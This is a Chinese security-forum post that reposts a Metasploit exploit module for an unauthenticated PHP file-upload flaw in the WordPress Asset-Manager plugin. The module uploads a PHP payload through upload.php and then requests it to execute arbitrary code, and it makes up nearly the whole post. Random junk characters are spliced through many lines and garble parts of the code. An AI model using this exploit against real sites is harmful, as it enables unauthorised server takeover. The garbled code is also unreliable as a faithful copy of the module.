找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2046|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。4 d* ^9 O$ W' ^0 M0 S/ }+ V
% t' H: ^1 J- G0 T- w
##
4 `% t; j$ J- ^1 D- W/ S# This file is part of the Metasploit Framework and may be subject to
6 ?! E# y$ u  o# redistribution and commercial restrictions. Please see the Metasploit
( d5 h/ f( W3 m, |0 L1 |" o# Framework web site for more information on licensing and terms of use.: x! @7 c! b% x1 E4 K" n$ _
#   http://metasploit.com/framework/: P, q. p6 H% Q0 m( {
##3 ?0 M9 a. d+ V; }, n, M- F( e! k
" d6 Z4 u7 i% s' h9 T" e. r
require 'msf/core'
9 R2 A" K6 w. K( h5 U# ~require 'msf/core/exploit/php_exe'
. g6 ?5 k# k% V9 g6 b
: b6 \  N0 K& o" ~/ w2 Z. T& pclass Metasploit3 < Msf::Exploit::Remote: E7 o( y8 x9 n6 r
  Rank = ExcellentRanking* U5 [: w0 s% Q) ?' C8 ]4 g

) u, I5 G7 v! z8 R3 T( r! |  include Msf::Exploit::Remote::HttpClient' @8 J0 |( Q$ w/ t# C5 a  A1 ^
  include Msf::Exploit:hpEXE- ?- S- |# v2 G
2 S0 y$ x# d( }2 T% h3 H7 I
  def initialize(info = {})# W0 o2 l, z) _+ ?
    super(update_info(info,6 l3 }6 j% j% `( {  a2 f3 O
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',) M3 @$ d9 `, q) u8 W
      'Description'    => %q{
  F, {8 b0 i' A  }        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
% t6 k! z- ?  ~8 u: s        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
$ q9 c# }, q5 O4 ~        temp directory without authentication, which results in arbitrary code execution.
( A6 k' M3 i: W4 Z3 Q      },9 N& i/ v7 `" s3 e6 z! X( s9 }4 e2 D  W
      'Author'         =>
, S9 O, g0 W  F  [4 y7 D! @; f$ Y        [
3 s; i, O) C$ i3 o$ u          'Sammy FORGIT', # initial discovery
; O: B; T" b# Z0 k          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
! ]2 H+ B" m$ B( n& t9 `3 y        ],: T- ], ]2 Y* {$ E  S! l$ |; r- j1 Z
      'License'        => MSF_LICENSE,: D8 E+ |- b/ M
      'References'     =>4 O: m* a- B, r* a4 D/ n+ V% v
        [+ ^3 ^! f2 S4 D# W7 S: k
          [ 'OSVDB', '82653' ],& }; U3 u# W6 {7 G
          [ 'BID', '53809' ],  t6 ]8 ?3 V. f+ O
          [ 'EDB', '18993' ],
; O6 o3 f- G) B5 v2 B          [ 'URL', 'http:// www.myhack58.com /' ]9 X" ]( r; T% \+ r& f$ x. H2 X$ M$ \
        ],
" s6 W' s2 J! J8 ]+ k8 T      'Payload'       =>' a5 O2 T' ^7 ?
        {: _0 W  [2 ~* J5 u  r
          'BadChars' => "\x00",. J( ~0 v* d& P1 I6 v  k6 q
        },9 G! r# Z8 \" M- K+ b
      'Platform'       => 'php',9 ^8 l: ~; j) r7 u6 f: y. W; p
      'Arch'           => ARCH_PHP,
# C4 N2 b" l/ Y2 Z( L% w3 y      'Targets'        =>4 l1 A3 n. y; _  z. v# n4 ]
        [, h1 O; a7 R- k! H
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
, a  |9 y, R% R8 R7 M" H          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
/ s- x) E) N% N9 h( h        ],4 V! I7 |( u; i; c( s# G: \, g
      'DefaultTarget' => 0,
4 D0 \; a+ z# ?& u# }0 ?      'DisclosureDate' => 'May 26 2012'))
6 M5 h/ h* _0 s( \6 C! ^   B. R9 K! ^' G$ X2 R
    register_options(
3 i7 K/ w5 C: f' O+ p      [; {( G6 R9 g' @/ ^- ~  o" H* ~
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])9 q0 ^* Y* h: ^1 Z: x! r  h( o
      ], self.class)$ f4 |9 H, A" f: h
  end
+ I% S; ~; n8 j' P* N
* O: Y) Q- [; r( O+ e  def exploit
' o7 E; b  L# Z    uri =  target_uri.path
8 C8 {" e1 L& \( L/ Q    uri << '/' if uri[-1,1] != '/'8 h* I8 G9 m- i) K% F
    peer = "#{rhost}:#{rport}"  x, J) _9 S3 v  D. ]7 `( Z
    payload_name = "#{rand_text_alpha(5)}.php"+ E9 {$ G9 w) I5 W5 a9 e' @9 M
    php_payload = get_write_exec_payload(:unlink_self=>true)
- T7 ]- U* f9 `9 S  Q5 x 1 J  ]" ]4 i8 r0 b' Q) N' N1 T' l
    data = Rex::MIME::Message.new
! \$ U! |: Y0 w& \9 m/ m% I( f: G$ P    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
; N/ z2 u7 J7 @' L% a    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')9 A! D4 E4 a/ ^' F' M4 R

( d. Q! {% r0 N  \- u0 U    print_status("#{peer} - Uploading payload #{payload_name}")5 m3 ?; O  Y1 K* S
    res = send_request_cgi({) q8 T5 p, P6 ^6 M" D
      'method'  => 'POST',( n" Z  P1 }" Z" G
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",- U& u0 l0 m, W5 y! I
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
! N, R  U' n% y6 w8 \* V      'data'    => post_data; G0 |5 a2 D1 r+ C- j3 ]/ }( ~  h: ?
    })$ Y8 M& @0 U3 t: {, V
0 B5 ?  ~$ E" S$ o
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
; D4 R5 o9 K, f      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
0 [5 [( O$ E3 L) Vend
( Y( X% ]2 e" X + e2 L0 m% d$ n: W% [# H& y3 W
    print_status("#{peer} - Executing payload #{payload_name}")
' U: Y2 G/ a4 p) }, ^8 V    res = send_request_raw({) z% [' W7 \/ D9 n2 W* d6 c
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",' L7 c. B  H! K. I' f$ `% z
      'method'  => 'GET') `7 m2 ]& O# B7 R
    })3 D% H# J: y( e
2 p4 q: ~5 L7 `3 F
    if res and res.code != 2006 q' M! e- n2 ]4 r) p7 J
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
# ]. F! z  w" z( w/ e    end
2 m% ?* l% B$ I$ q5 h  end+ k3 p) U% O& }: ^3 T
end
  z  @! V4 n3 ~/ y3 s% R& V
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表